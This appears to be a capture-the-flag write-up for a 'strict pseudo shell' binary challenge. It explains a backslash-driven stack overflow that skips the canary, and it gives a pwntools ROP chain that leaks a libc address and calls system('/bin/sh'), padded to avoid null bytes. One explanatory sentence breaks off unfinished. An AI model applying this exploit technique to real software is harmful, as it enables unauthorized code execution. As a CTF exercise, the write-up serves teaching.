Tags: ropchain
Rating:
Professor Shelle was mad that everyone bypassed her psuedo shell and read the flag, Now she removed the vulnerability and thinks that the new strict-psuedo shell is secure.. hah, time to prove her wrong.
We have to deal with a wannabe-shell, it asks us for a command and... doesn't execute it because everything is removed for security reasons.
The vulnerable part of the code is inside the run_cmds function, of course:
...
string_offset = 56;
...
input_index = 0;
...
getline(&input_line, &n, stdin);
...
string_index = string_offset;
while ( string_index <= 499 )
{
if ( input_line[input_index] == 92 )
{
++input_index;
}
else
{
if ( input_line[input_index] )
s[input_index - 1 + string_offset] = input_line[input_index];
++input_index;
++string_index;
}
}
If we supply a lot of \ characters (92 ASCII) we can move input_index as far as we want, then we can provide our payload and let the loop copy it inside the stack buffer s.
The binary has the following protections:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
so everything we can do is ROP attack and we have to deal with the canary, but we have no PIE so no leak is needed for the binary addresses.
The stack canary can be defeated simply by skipping it with enough \ characters and writing just after it.
We have another problem: it doesn't copy all the characters, infact if we supply \x00 it will be skipped in the check:
if ( input_line[input_index] )
s[input_index - 1 + string_offset] = input_line[input_index];
So if the stack has some bytes where we need to put a zero byte our ropchain won't work.
Luckily we have enough stack and input space to place our chain in pieces and use some pop stuff gadget to pad the different pieces.
Since we want to pop us a shell we need to leak a libc address, the correct libc can be found in two different ways:
In the end we can use the classic ropchain:
# leak puts@got
payload += p64(pop_rdi)
payload += p64(exe.got.puts)
payload += p64(puts)
# second stage
payload += p64(exe.sym.run_cmds)
# system("/bin/sh")
payload += p64(pop_rdi)
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(libc.sym.system)
but with all the stack cleanup stuff it becomes:
payload += p64(pop_5)
payload += p64(5)
payload += p64(4)
payload += p64(3)
payload += p64(2)
payload += p64(1)
payload += p64(pop_4)
payload += p64(4)
payload += p64(3)
payload += p64(2)
payload += p64(1)
payload += p64(pop_3)
payload += p64(3)
payload += p64(2)
payload += p64(1)
# leak puts@got
payload += p64(pop_rdi)
payload += p64(exe.got.puts)
payload += p64(puts)
payload += p64(pop_3)
payload += p64(3)
payload += p64(2)
payload += p64(1)
# second stage
payload += p64(exe.sym.run_cmds)
payload += p64(pop_2)
payload += p64(2)
payload += p64(1)
payload += p64(pop_rdi)
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(pop_2)
payload += p64(2)
payload += p64(1)
payload += p64(libc.sym.system)
